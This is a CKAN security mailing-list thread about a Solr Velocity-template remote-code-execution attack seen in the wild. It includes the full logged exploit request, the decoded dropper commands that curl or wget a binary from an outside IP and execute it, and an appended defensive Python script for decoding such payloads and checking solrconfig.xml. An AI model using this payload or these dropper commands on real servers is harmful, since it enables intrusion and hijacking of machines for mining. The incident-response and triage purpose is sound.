[CKAN-Security] Vulnerability in the Wild

Tyler Kennedy tk at tkte.ch
Thu Nov 7 11:24:37 UTC 2019


Ah...right, that would make sense.

I don't believe velocity templates are ever enabled by default, but we
should probably double-check. If any of our recommended versions do, we
should post a notice (blog, twitter?).

I reached out to ARNES and they've taken down the particular servers
involved in this one, which is the IP the bitcoin miner is being served
from as well as the pool address it's connecting to.

On Thu, Nov 7, 2019 at 5:49 AM Adrià Mercader <adria.mercader at okfn.org>
wrote:

> @Tyler Kennedy <tk at tkte.ch>
> I'm not sure the OP gets your messages if you don't include them in the
> response.
> Good to know it's not harmful.
>
>
>
>
> On Wed, 6 Nov 2019 at 20:00, Tyler Kennedy <tk at tkte.ch> wrote:
>
>> This is what it tries to run (duplicate lines are not a mistake; this is
>> a script kiddie trying to piece something together, so it is messy):
>>
>> ```
>> /usr/bin/curl -o /root/rter http://194.249.0.167/sites/default/files/sync
>> chmod +x /root/rter
>> chmod 777 /root/rter
>> /root/rter
>> /root/rter 2>&1
>> /usr/bin/curl -o /tmp/erta http://194.249.0.167/sites/default/files/sync
>> chmod +x /tmp/erta
>> chmod 777 /tmp/erta
>> /tmp/erta
>> /tmp/erta
>> /usr/bin/wget -O /home/so*/fert http://194.249.0.167/sites/default/files/sync
>> chmod 777 /home/so*/fert
>> /home/so*/fert
>> /home/so*/fert
>> /usr/bin/curl -o /var/tmp/etfet http://194.249.0.167/sites/default/files/sync
>> chmod 777 /var/tmp/etfet
>> /var/tmp/etfet
>> /usr/bin/wgetak -O /var/tmp/rtsfv http://194.249.0.167/sites/default/files/sync
>> chmod 777 /var/tmp/rtsfv
>> /var/tmp/rtsfv
>> /var/tmp/rtsfv
>> /usr/bin/curl -o /dev/shm/reuer http://194.249.0.167/sites/default/files/sync
>> chmod 777 /dev/shm/reuer
>> /dev/shm/reuer
>> /usr/bin/wget -O /dev/shm/reuer http://194.249.0.167/sites/default/files/sync
>> chmod 777 /dev/shm/reuer
>> ```
>>
>> On Wed, Nov 6, 2019 at 1:51 PM Tyler Kennedy <tk at tkte.ch> wrote:
>>
>>> Hello.
>>>
>>> This is not a CKAN exploit, but an exploit in Solr allowing remote code
>>> execution. It is copied from
>>> https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
>>> Are you sure this actually affected you? You will see garbage in the
>>> logs that did nothing all the time as bots try to find exploits. Make sure
>>> VelocityResponseWriter is disabled (should be by default) and this exploit
>>> will do nothing.
>>>
>>> Thank you,
>>> Tyler Kennedy
>>>
>>> On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:
>>>
>>>> Ckan 2.8.x
>>>> Solr 6.6.x
>>>> Solr Logs:
>>>>  webapp=/solr path=/select
>>>> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
>>>> hits=0 status=0 QTime=0
>>>>
>>>> Any version unaffected?
>>>> How could we fix it?
>>>>
>>>> --
>>>> You received this message because you are subscribed to the Google
>>>> Groups "CKAN Security" group.
>>>> To unsubscribe from this group and stop receiving emails from it, send
>>>> an email to security+unsubscribe at ckan.org.
>>>> _______________________________________________
>>>> CKAN security
>>>> https://lists.okfn.org/mailman/listinfo/security
>>>> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>>>>
>>>> Repo: https://github.com/ckan/ckan-security
>>>
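Two things the thread does by hand are worth having as a script: pulling the shell commands out of a Solr request log line like the one Fabian posted (the `{echo,<base64>}|{base64,-d}|{bash,-i}` pipeline that Tyler decoded), and the "double check" Tyler suggests, i.e. confirming whether VelocityResponseWriter is registered in a core's solrconfig.xml. The following is an added example, not code from the original thread, CKAN or Solr. The sample log line and sample solrconfig.xml are constructed: the log line has the same shape as the posted one but carries a short payload pointing at a documentation-range IP (203.0.113.5), and the config fragment mirrors the shape of the writer registration in Solr's sample configs. The `params.resource.loader.enabled` check reflects the condition the public Velocity-template exploits rely on (the writer registered and that flag true); that requirement is general Solr knowledge, not something the thread states.

```python
"""Triage helpers for the Solr Velocity-template RCE probe discussed above.

Added example, not CKAN or Solr project code.  Two checks:
  1. recover the shell commands from a Solr request log line that carries
     the {echo,<base64>}|{base64,-d}|{bash,-i} pipeline;
  2. inspect a solrconfig.xml and report whether VelocityResponseWriter is
     registered and whether params.resource.loader.enabled resolves to true.
"""
from __future__ import annotations

import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import quote, unquote

# --- constructed sample input (not the real log line from the thread) -----
SAMPLE_CMD = "/usr/bin/curl -o /tmp/x http://203.0.113.5/sync ; chmod 777 /tmp/x ; /tmp/x"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode()).decode()
# Percent-encode the base64 token as a real request would, so '+', '/' and
# '=' inside it survive the URL layer (the posted log shows '=' as %3D).
SAMPLE_LOG = (
    "webapp=/solr path=/select params={q=1&v.template=custom"
    "&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))"
    "+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo," + quote(SAMPLE_B64, safe="")
    + "}|{base64,-d}|{bash,-i}'))+$ex.waitFor()&wt=velocity} hits=0 status=0 QTime=0"
)

# Constructed solrconfig.xml fragment with the writer registered but the
# params loader left at its default of false.
SAMPLE_SOLRCONFIG = """<?xml version="1.0"?>
<config>
  <queryResponseWriter name="json" class="solr.JSONResponseWriter"/>
  <queryResponseWriter name="velocity" class="solr.VelocityResponseWriter" startup="lazy">
    <str name="template.base.dir">${velocity.template.base.dir:}</str>
    <str name="params.resource.loader.enabled">${velocity.params.resource.loader.enabled:false}</str>
  </queryResponseWriter>
</config>
"""

PARAMS_RE = re.compile(r"params=\{(.*)\}(?=\s+hits=)", re.DOTALL)
ECHO_B64_RE = re.compile(r"\{echo,([A-Za-z0-9+/=]+)\}\|\{base64,-d\}")


def solr_params(log_line: str) -> dict:
    """Split the params={...} part of a Solr request log line into a dict.
    Values are percent-decoded only; '+' is left as-is because the Velocity
    template uses it for spaces and base64 uses it as data."""
    m = PARAMS_RE.search(log_line)
    if not m:
        return {}
    out = {}
    for kv in m.group(1).split("&"):
        key, _, val = kv.partition("=")
        out[key] = unquote(val)
    return out


def is_velocity_probe(params: dict) -> bool:
    """Signature of this exploit family: the velocity writer is requested and
    the template itself is supplied in the request."""
    return params.get("wt") == "velocity" and "v.template.custom" in params


def decode_payload(params: dict) -> list[str]:
    """Recover the shell script from the {echo,<b64>}|{base64,-d} pipeline and
    split it on ';' into the individual commands.  Empty list if absent."""
    m = ECHO_B64_RE.search(params.get("v.template.custom", ""))
    if not m:
        return []
    script = base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    return [c.strip() for c in script.split(";") if c.strip()]


def download_urls(commands: list[str]) -> set[str]:
    """Hosts worth blocking / reporting: every URL the dropper fetches from."""
    return set(re.findall(r"https?://\S+", " ".join(commands)))


def velocity_writer_status(solrconfig_xml: str) -> dict:
    """Report whether VelocityResponseWriter is registered and whether
    params.resource.loader.enabled is true.  A ${prop:default} value is
    resolved to its default, which is what applies unless the system
    property is set at startup."""
    root = ET.fromstring(solrconfig_xml)
    status = {"registered": False, "params_loader_enabled": False}
    for writer in root.iter("queryResponseWriter"):
        if "VelocityResponseWriter" not in writer.get("class", ""):
            continue
        status["registered"] = True
        for s in writer.findall("str"):
            if s.get("name") == "params.resource.loader.enabled":
                val = (s.text or "").strip()
                m = re.fullmatch(r"\$\{[^:}]+:([^}]*)\}", val)
                if m:
                    val = m.group(1)
                status["params_loader_enabled"] = val.lower() == "true"
    return status


if __name__ == "__main__":
    p = solr_params(SAMPLE_LOG)
    print("velocity probe:", is_velocity_probe(p))
    for cmd in decode_payload(p):
        print("  ", cmd)
    print("fetches from:", download_urls(decode_payload(p)))
    print("solrconfig:", velocity_writer_status(SAMPLE_SOLRCONFIG))
```

Run `solr_params` over the request log of the core CKAN uses and treat any `is_velocity_probe` hit as a probe to record, then `decode_payload` to get the dropper commands and `download_urls` for the hosts to report, which is what was done here with ARNES. The static `velocity_writer_status` check only tells you what the core starts with: on a Solr that is reachable without authentication the Config API can change writer settings at runtime, so if the writer is registered at all the safer fix is to remove the `queryResponseWriter` entry and keep Solr off the network CKAN's users can reach.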